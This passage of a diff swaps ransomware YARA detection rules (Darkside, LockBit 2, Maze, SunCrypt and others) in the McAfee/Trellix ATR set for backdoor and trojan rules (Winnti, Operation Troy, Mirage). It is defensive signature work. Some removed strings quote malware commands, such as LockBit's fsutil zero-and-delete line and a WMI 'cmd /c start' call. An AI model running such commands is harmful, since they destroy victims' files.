?74??C7????????????E8????????C6????????????8D??????5B5DC3908D??????55B8????????89??8D??????E8????????5A81??????????85??74??89??????C7??????????????C7??????????????C7????????????E8????????A1????????85??74??B8????????85??74??C7????????????FF??C9C39090905589??83????8B????88????A1????????85??74??A1????????0FB6????88??83????A3????????EB??C7??????????????8D????89??????C7????????????E8????????C9C35589??83????EB??8B????0FB6??0FBE??83??????89????E8????????8B????0FB6??84??75??C9C35589??83????8B????0FB6??88????83??????80??????0F84????????80??????74??0FBE????89????E8????????E9????????C7????????????8B????0FB6??88????83??????80??????75??C7????????????8B????0FB6??88????83??????EB??80??????75??C7????????????8B????0FB6??88????83??????C7????????????EB??8B????89??C1????01??01??89??0FBE????8D????83????89????8B????0FB6??88????83??????80??????7E??80??????7E??80??????74??80??????75??83??????8B????0FB6??88????83??????80??????0F84????????0FB6????88????80??????7E??0FB6????83????88????0FBE????83????83????0F87????????8B????????????FF??8B????8D????89????8B??89????C7????????????EB??83??????8B????8B????8D????0FB6??84??75??EB??C7????????????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??8B????89????E8????????EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????8B????8D????89????8B??0FBE??89????E8????????E9????????C7????????????EB??C7????????????EB??C7????????????EB??C7????????????EB??0FBE????89????E8????????E9????????8B????83????85??74??8B????8D????89????8B??EB??80??????75??8B????8D????89????8B??EB??8B????8D????89????8B??89????80??????75??8B????85??79??F7????83??????C7????????????8B????BA????????F7????89??88????8B????BA????????F7????89????80??????7E??80??????75??B8????????EB??B8????????0FB6????01??88????8B????0FB6????83????88??????83??????83??????74??83??????76??8B????83????85??74??8B????C6????????83??????8B????89????8B????83????84??74??B8????????EB??B8????????88????EB??0FBE????89????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??83??????8B????0FB6??????0FBE??89????E8????????83??????75??EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????E9????????90EB??90C9C35589??83????8D????89????8B????89??????8B????89????E8????????C9C35589??83????8B????8B????88????88????C9C35589??57565381??????????8B????8B????88??????????88??????????C7??????????????????C7??????????????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????66????????????8D??????????BA????????89??????C7??????????????89????E8????????83????????????0F84????????83????????????0F84????????8B??????????89????E8????????3D????????0F8F????????8B??????????89????E8????????83????0F8F????????8B??????????89????E8????????83????0F8F????????C7??????????????????EB??8B??????????03??????????0FB6??3C??7E??8B??????????03??????????0FB6??3C??7F??8B??????????03??????????8B??????????03??????????0FB6??83????88??8B??????????83????89??????????8B??????????89????E8????????8B??????????39??7F??81??????????????????7E??C7??????????????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????8B??????????C7??????????????89????E8????????89??????????C7??????????????????E9????????8B??????????69??????????03??????????C6??????8B??????????69??????????03??????????C7??????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????0FB6??????????3C??74??8B??????????69??????????03??????????05????????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????69??????????03??????????81??????????83????89??????89??????89????E8????????8B??????????69??????????03??????????C6????????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????3C??0F87????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????E8????????89??E8????????89??0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????0FB6??89??89??D3??89??8D????89????E8????????89????E8????????89??BA????????89??F7??89??C1????89??C1????01??89??29??83????0F87????????8B????????????FF??C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7???????????? }
 
 	condition:
-		$pattern_0 or $pattern_1 and filesize < 5831344
+		uint16( 0 ) == 0x457f and filesize < 3000KB and all of them
 }
-rule TRELLIX_ARC_RANSOM_Darkside_DLL_May2021 : RANSOM FILE
+
+rule TRELLIX_ARC_APT_Stolen_Certificates : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Darkside Ransomware as a DLL"
-		author = "TS @ McAfee ATR"
-		id = "e9d64637-dc8f-5650-81e1-34e27e6ee912"
-		date = "2021-05-14"
-		modified = "2023-07-27"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Darkside.yar#L26-L47"
+		description = "Rule to detect samples digitally signed from these stolen certificates"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "57051977-780c-5c8e-bc66-0f1d8b3bbd93"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L196-L221"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "f587adbd83ff3f4d2985453cd45c7ab1"
-		logic_hash = "39930b6f352642647ea6b80f941201b93d6a9defd42cb75f9e4f7239ff17a4ec"
+		hash = "ce3424524fd1f482a0339a3f92e440532cff97c104769837fa6ae52869013558"
+		logic_hash = "9b700e4889349d0203bdd4e00035ee9c9aba5025ccc57eef915b2c78996f8160"
 		score = 75
 		quality = 70
-		tags = "RANSOM, FILE"
-		rule_type = "Public"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "Ransom"
-
-	strings:
-		$s1 = "encryptor2.dll" wide ascii
-		$s2 = "DisableThreadLibraryCalls" wide ascii
-		$s3 = "KERNEL32.dll" wide ascii
-		$pattern1 = {D24DC8855EDD487B3CD2D545F11031E1FA85C2F2440712445F67D105B326533A77BA75B3383A98CE97EAA2B95798DCFA6B75B5573662F9ED5DC9B7D2E582FD94104E210F3EA62A1826B26B952FFBD5A70A97E6EC3D14794577A2980A0ED1EE02CA291623DD3721A7E68223EDA56F9E1325FE36E191D5C41F7227D55EDC3D5B9359C819}
-		$pattern2 = {87FC982E066F585B73D417C0D5F75B86B9F9F8286B4CC42BB2053912D595A68C07C0EDD0159AC785880C5483E246D3501F6523D05078B9B7510711423948D4CB367C83C0833BD04AD6DC655E1BEEA38770470BB48B6EBA70944E952526E4D87A03BAA485D7B4DA1318A00EF07FA76C0D}
-		$pattern3 = {1B6F099F1C3C62BBF5543FA03B919C7BF5E477D256CE79D98C55ACE8D69CDC9373B2F0A2B51414776D5226B74BF9A7CB935C9DD04BCFC19FC81418F7A39244A730697E1BC05418BF41DE50E4C8609533591CE80617D476E686B36CF2AE914CB3AFD720A33C0D5DE438F1CD0B}
-		$pattern4 = {5060E373F1D3B3BB8D15C851BBFC73F60390681C488F7C0B80FC2EDBC1ED88CEA82014B9223A70EA0BB7DD0D2560A29D39381FEE7B73AE22683AE05C369918F8C5772678A9F29CEF65854238D1C2B762CC12706637154F57A9}
-		$pattern5 = {EE452560DBD5A4F46FB562C9C707C8D014BB8F1C18E4467E249F5AC69A87954F5B69650B7A759CE2DD075E99CBCBA37A9C5A0650EDF06285F8F990AF6B94FBA08E3C0B2EBDE3C155ECDB06C30F95D76695}
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	condition:
-		filesize >= 45KB and filesize <= 70KB and all of ( $s* ) and 4 of ( $pattern* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" or pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" )
 }
-rule TRELLIX_ARC_Loocipher_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Troy_Malware_Campaign_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Loocipher ransomware"
+		description = "Rule to detect the Operation Troy based on the PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "d18efe09-4b04-5089-84f8-aead63fc19bb"
-		date = "2019-12-05"
+		id = "c1fc5b9c-104f-5d07-86ee-5a54d9731f04"
+		date = "2013-06-23"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Loocipher.yar#L1-L46"
+		reference = "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_operation_troy.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "7720aa6eb206e589493e440fec8690ceef9e70b5e6712a9fec9208c03cac7ff0"
-		logic_hash = "36e452c34fd9bbb521f5422bffdbb71991de66f3faa29292dc3f27c8d7e1f9ba"
+		hash = "2ca6b7e9488c1e9f39392e696704ad3f2b82069e35bc8001d620024ebbf2d65a"
+		logic_hash = "a64b4aa082c45d1753ad30ba2f67df0ef5b7658c3c99e031ef747eb4e6c7bb00"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Loocipher"
-		actor_type = "Cybercrime"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/OperationTroy"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$x1 = "c:\\users\\usuario\\desktop\\cryptolib\\gfpcrypt.h" fullword ascii
-		$x2 = "c:\\users\\usuario\\desktop\\cryptolib\\eccrypto.h" fullword ascii
-		$s3 = "c:\\users\\usuario\\desktop\\cryptolib\\gf2n.h" fullword ascii
-		$s4 = "c:\\users\\usuario\\desktop\\cryptolib\\queue.h" fullword ascii
-		$s5 = "ThreadUserTimer: GetThreadTimes failed with error " fullword ascii
-		$s6 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator *" fullword wide
-		$s7 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator +=" fullword wide
-		$s8 = "std::basic_string<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator []" fullword wide
-		$s9 = "std::vector<struct CryptoPP::ProjectivePoint,class std::allocator<struct CryptoPP::ProjectivePoint> >::operator []" fullword wide
-		$s10 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator *" fullword wide
-		$s11 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator +=" fullword wide
-		$s12 = "std::vector<struct CryptoPP::WindowSlider,class std::allocator<struct CryptoPP::WindowSlider> >::operator []" fullword wide
-		$s13 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator ++" fullword wide
-		$s14 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator *" fullword wide
-		$s15 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::_Compat" fullword wide
-		$s16 = "std::vector<class CryptoPP::PolynomialMod2,class std::allocator<class CryptoPP::PolynomialMod2> >::operator []" fullword wide
-		$s17 = "DL_ElgamalLikeSignatureAlgorithm: this signature scheme does not support message recovery" fullword ascii
-		$s18 = "std::vector<struct CryptoPP::ECPPoint,class std::allocator<struct CryptoPP::ECPPoint> >::operator []" fullword wide
-		$s19 = "std::vector<struct CryptoPP::EC2NPoint,class std::allocator<struct CryptoPP::EC2NPoint> >::operator []" fullword wide
-		$s20 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::_Compat" fullword wide
+		$pdb = "\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy(Winlogon_Shell)\\SetKey_WinlogOn_Shell_Modify\\BD_Installer\\Release\\BD_Installer.pdb"
+		$pdb1 = "\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy(Winlogon_Shell)\\Dll\\Concealment_Troy(Dll)\\Release\\Concealment_Troy.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and ( 1 of ( $x* ) and 4 of them ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
 }
-rule TRELLIX_ARC_Lockbit2_Jul21 : FILE
+rule TRELLIX_ARC_Apt_Lagulon_Trojan_Pdb : TROJAN FILE
 {
 	meta:
-		description = "simple rule to detect latest Lockbit ransomware Jul 2021"
-		author = "CB @ ATR"
-		id = "22b423df-ae5c-5672-95be-333b13791fc6"
-		date = "2021-07-28"
-		modified = "2021-07-28"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Lockbit2.yar#L1-L25"
+		description = "Rule to detect trojan Lagulon based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "a31a465d-1f16-5c3e-a62d-ea15c11253c3"
+		date = "2013-08-31"
+		modified = "2020-08-14"
+		reference = "https://www.cylance.com/operation-cleaver-cylance"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_lagulon_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "b3ed7d7c72b7585877293f586bae5ec7b0135b09d518b4e4b08f64e60db5a159"
-		score = 50
+		hash = "e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53"
+		logic_hash = "dad04c2deb990f253f952b768b74349dc9afb5f6db91ea3afff889f4c9f3230b"
+		score = 75
 		quality = 70
-		tags = "FILE"
-		version = "v1"
-		hash1 = "f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202"
-		hash2 = "dd8fe3966ab4d2d6215c63b3ac7abf4673d9c19f2d9f35a6bf247922c642ec2d"
+		tags = "TROJAN, FILE"
+		rule_version = "v1"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/lagulon"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$seq1 = " /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" fullword wide
-		$seq2 = "\"C:\\Windows\\system32\\mshta.exe\" \"%s\"" fullword wide
-		$p1 = "C:\\windows\\system32\\%X%X%X.ico" fullword wide
-		$p2 = "\\??\\C:\\windows\\system32\\%X%X%X.ico" fullword wide
-		$p3 = "\\Registry\\Machine\\Software\\Classes\\Lockbit\\shell\\Open\\Command" fullword wide
-		$p4 = "use ToxID: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" fullword wide
-		$p5 = "https://tox.chat/download.html" fullword wide
-		$p6 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" fullword wide
-		$p7 = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" fullword wide
-		$p8 = "\\LockBit_Ransomware.hta" fullword wide
+		$pdb = "\\proj\\wndTest\\Release\\wndTest.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $seq* ) and 4 of them ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Maze : RANSOMWARE FILE
+rule TRELLIX_ARC_APT_Winnti : BACKDOOR FILE
 {
 	meta:
-		description = "Detecting MAZE Ransomware"
-		author = "McAfee ATR"
-		id = "098a93c4-9aab-5563-af17-7aa91b056f64"
-		date = "2020-04-19"
-		modified = "2020-10-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Maze.yar#L1-L39"
+		description = "Detects Winnti variants"
+		author = "McAfee ATR Team"
+		id = "f12b039a-2508-580f-b777-428bbda2c666"
+		date = "2020-06-04"
+		modified = "2020-10-14"
+		reference = "https://attack.mitre.org/software/S0141/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_winnti.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5badaf28bde6dcf77448b919e2290f95cd8d4e709ef2d699aae21f7bae68a76c"
-		logic_hash = "fc16475fbc2a2acf5d053ded4d2ec4126c6d6dcac3a6eafadcd6c61419dd7594"
+		hash = "fd539d345821d9ac9b885811b1f642aa1817ba8501d47bc1de575f5bef2fbf9e"
+		logic_hash = "f94b2c552fbb30e1005e5c75a2f449d60b9558a0916197bed41bf32c6477daef"
 		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Maze"
-		actor_type = "Cybercrime"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Winnti"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$x1 = "process call create \"cmd /c start %s\"" fullword wide
-		$s1 = "%spagefile.sys" fullword wide
-		$s2 = "%sswapfile.sys" fullword wide
-		$s3 = "%shiberfil.sys" fullword wide
-		$s4 = "\\wbem\\wmic.exe" fullword wide
-		$s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
-		$s6 = "NO MUTEX | " fullword wide
-		$s7 = "--nomutex" fullword wide
-		$s8 = ".Logging enabled | Maze" fullword wide
-		$s9 = "DECRYPT-FILES.txt" fullword wide
-		$op0 = { 85 db 0f 85 07 ff ff ff 31 c0 44 44 44 44 5e 5f }
-		$op1 = { 66 90 89 df 39 ef 89 fb 0f 85 64 ff ff ff eb 5a }
-		$op2 = { 56 e8 34 ca ff ff 83 c4 08 55 e8 0b ca ff ff 83 }
+		$pattern = { 9090909090909090909090909090C7????????????C2????90909090909081??????????E9????????CCCCCCCCCC8A??????8B??????538A??8A??568B??578B??????8B??C1????66????8B??C1????F3AB8B??83????F3AA8B??5F5E5BC390909090909090909090909090909083????5333??568D??????535089??????89??????E8????????8A??33??3A??8D??????0F94??83????5389??????528B??89??????C6????????E8????????8B??33??81??????????8D??????0F94??6A??89??????5223??89??????C6????????C6????????E8????????33??66????8D??????6A??0F94??89??????89??????5223??C6????????C6????????E8????????8B??83????33??3B??0F94??23??5E495BF7??1B??8B??83????C38B??????8B??????03??C390909090908B??????85??0F84????????8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??E9????????83????C39090909090909090909090909083????8B??????53558B??????33??568B??????83????5789??????76??81??????????8B??76??BF????????8B??????8D????03??C1????03??89??????3B??76??8B??????68????????6A??52E8????????8B??????8B??????8B??????505351565752E8????????8B??????8B??8B??????2B??8B??83????03??8B??????83????89??????77??03??0F84????????8B??????8B??????2B??03??3B??89??????75??81??????????77??8A??04??EB??83????77??08????EB??83????77??8A??80????88??EB??8D????C6????463D????????89??????76??8D????B8????????F7??C1????8B??33??8B??8B??C1????F3AB8B??83????03??F3AA8B??????81??????????4A89??????75??8B??????8B??88??468A??88??46424B75??8B??????C6????465FC6????46C6????2B??8B??????4633??89??5E5D5B83????C390909090909090909083????8B??????53558B??????568B??????8D????5789??????8B??????83????73??B8????????2B??EB??33??03??8B??2B??C1????8D??????89??????8B??????8B??????8D????3B??0F83????????8B??8B??69??????????8B??????8B??????C1????33??66??????03??8B??????2B??????89??????66??????8B??3B??0F85????????8B??????C7??????????????2B??8B??????8B??2B??0F84????????83????77??8A????0A??88????8B????89??03??E9????????83????77??8A??2C??88??468B????89??8B????89????8B????89????8B????89????03??E9????????83????77??8A??80????88??46EB??8D????C6????463D????????89??????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??8B??????81??????????4889??????75??8B??????8B??8B??????88??468B????89??8B????89????8B????89????8B????89????83????83????83????83????73??85??76??8A????88??46454B75??BB????????8B????8B????33??75??BB????????03??8B????8B??33??8B??????83????3B??73??8B??2B??????85??75??83????83????8B????8B??33??8B??????3B??72??EB??84??75??C1????4384??74??8B??????8B??03??2B??83????89??????77??3D????????77??4880????8A??80????C0????C0????0A??88??46C1????88??46E9????????3D????????77??4883????89??????77??80????80????EB??83????C6????4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????2D????????83????89??????77??8B??80????C1????80????8A??0A??80????88??46C0????88??46C1????88??46E9????????8B??83????C1????80????80????88??4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????8B??????E9????????8B??????8B??????8B??????2B??89??8B??5F2B??5E5D03??5B83????C390909090909090909090908B??????538B??????55568B??????C7??????????578A??8D????8B??????80????8B??76??81??????????8D????83????8B??83????0F82????????8A??88??40414F75??EB??33??8A??418B??83????0F83????????85??75??80????75??8A????81??????????4184??74??33??8A??418D??????8B??89??83????83????4E74??83????72??8B??89??83????83????83????83????73??85??76??8A??88??40414E75??EB??8A??88??40414E75??33??8A??418B??83????73??33??8B??8A??C1????2B??C1????2B??8A??????????81??????????4188??40478A??88??8A????4088??408A????83????8B??0F84????????8A??88??404183????76??8A??88??404183????76??8A??88??404133??8A??418B??83????72??8B??8B??C1????83????2B??33??8A??C1????2B??4F41C1????4E8A??88??8A????404788??40478A??88??40474E75??EB??83????72??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????8D????66????81??????????C1????2B??83????EB??83????0F82????????8B??8B??83????C1????2B??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????66????81??????????C1????2B??83????3B??74??81??????????83????0F82????????8B??2B??83????0F8C????????8B??89??83????83????83????8B??89??83????83????83????83????73??85??0F86????????8A??88??40474E75??E9????????33??8B??8A??C1????2B??C1????2B??4F41E9????????8B??????2B??3B??89??75??5F5E5D33??5BC31B??5F24??5E5D83????5BC39090909090909090909090909081??????????568B??68????????C7??????????FF??????????83????75??57B9????????33??8D??????66????????????F3AB66AB8D??????5068????????FF??????????83????5F75??6A??68????????FF??????????8B??5E81??????????C390909090909090909090909090568B??E8????????F6????????74??56E8????????83????8B??5EC2????909068????????C7??????????FF??????????85??75??FF??????????C39090909053558B??????5685??5774??8B??????85??74??33??33??33??85??76??8A??????????8A??????????32??80????32??8A????32??33??88????8D????BE????????F7??8D????BF????????8B??33??F7??413B??8B??72??5F5E5D5BC39083????538B??????55565768????????68????????5333??FF??????????8B??85??0F84????????68????????FF??????????8B??B0??88??????88??????8D??????B1??5056C6????????88??????C6????????C6????????C6????????C6????????88??????C6????????C6????????C6????????C6????????FF??????????5753FF??568B??FF??????????85??74??57FF??????????8B??8B??????B9????????8B??68????????50F3A5E8????????83????B8????????5F5E5D5B83????C35F8B??5E5D5B83????C39090538B??????????5657C7??????????8D????BF???????? }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule TRELLIX_ARC_RANSOM_Suncrypt : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Mirage_Pdb : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect SunCrypt ransomware"
-		author = "McAfee ATR Team"
-		id = "92655f3e-f8e4-5c9f-ae3f-0796bd31d660"
-		date = "2020-10-02"
-		modified = "2020-11-02"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Suncrypt.yar#L1-L25"
+		description = "Rule to detect Mirage samples based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "49b7623f-a2c9-52e4-8679-d62f6aae99ca"
+		date = "2012-09-18"
+		modified = "2020-08-14"
+		reference = "https://www.secureworks.com/research/the-mirage-campaign"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_mirage_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "9f27c6c5bfe0d01ed517d55687bf699814679488f95ce4942306f09f39e29d85"
+		hash = "0107a12f05bea4040a467dd5bc5bd130fd8a4206a09135d452875da89f121019"
+		logic_hash = "cb88dc787d9964451ea93f5574d9c73ae6a820d81e20d41c3c8ee44c3fee032d"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/Suncrypt"
-		actor_type = "Cybercrime"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Mirage"
+		actor_type = "Apt"
 		actor_group = "Unknown"
-		hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
-		hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
 
 	strings:
-		$pattern = { 77??2F475263????78??58436463????77??7A??5263????78??5846534D5A4678??48475263??????6B??????4D5A4679??7A??5263????78??584C5163????7A??44475264??5778??58526163????30????475264??30????58556463????31????475264??73??6B??????63????32????4752646C73??6B??????38????32??5047526477??6A??5738????68????????41555039????496C46374931????46446F62????414146442F565169????????????5039????466D4A526669??????????64??63????4F6D38????414169??????????586F69??????????33????30????69????????????6F41444141414974??38????41554542516167??2F5665??4478??434A526679??6666????64??63????4F6D444141414169??????????33??69????????????77??33????2F33????2F33????36??49464141434478??7A??64667A??64??7A??64??6A??73??7A??2F34??454449584164??517A??4F74??69??????????5834??5558672F33????2F33????36??6E362F2F39????59584164??517A??4F73??69??????????33??69????????????554B30????69????????????30????5838????5830????5549554974??4446434C525268????????30??39????77??444A77??574C37495073??4D5A4634??62????65??70??6B??????73??4634??54475265??31????586C5963????35????????65????78??586F63????4636??2F47526570??78??5872??63????37475047526531??78??5875??4931????46446F534163????46442F565169????????????66??51616B??????52434C51416A??63????4C5252442F63????2F566679??78??434677??55454D38??????475368????????41496C462B????462B????4E454974??49496C49434974??454974??434974??454974??49414E494B496C4E39????4639????517A??5041514D6E44565976??555974??434974??434974??434974??494474??4E4855464D38????367A??4C525169??????????????6C72??51574466??68????????454D38??????6F74??434974??434974??434974??494374??4E496C4E2F5039??2F4974??435039????4F6A??2B????2F57566E4A77??574C37494873??41414141494E6C6C4143445A6141416733??514148554969??????????30??????44475266??75??6B??????4D5A4638????475266??73??6B??????4D5A4639????475266??6B??????33????5A462B????4752666B??????5867??73??4634??6E475265??79??6B??????4D5A4635????????65??68????????62????4635????????65??????????70??63????366E4C47526574??78??5873??4D5A4630????475264??70??6B??????73??4630??54475264??31????58565963????31????475264????78??585962????4632????47526470??78??5862????5A4633????475262????78??5739????5A4676??54475262??4478??58416463????77??4C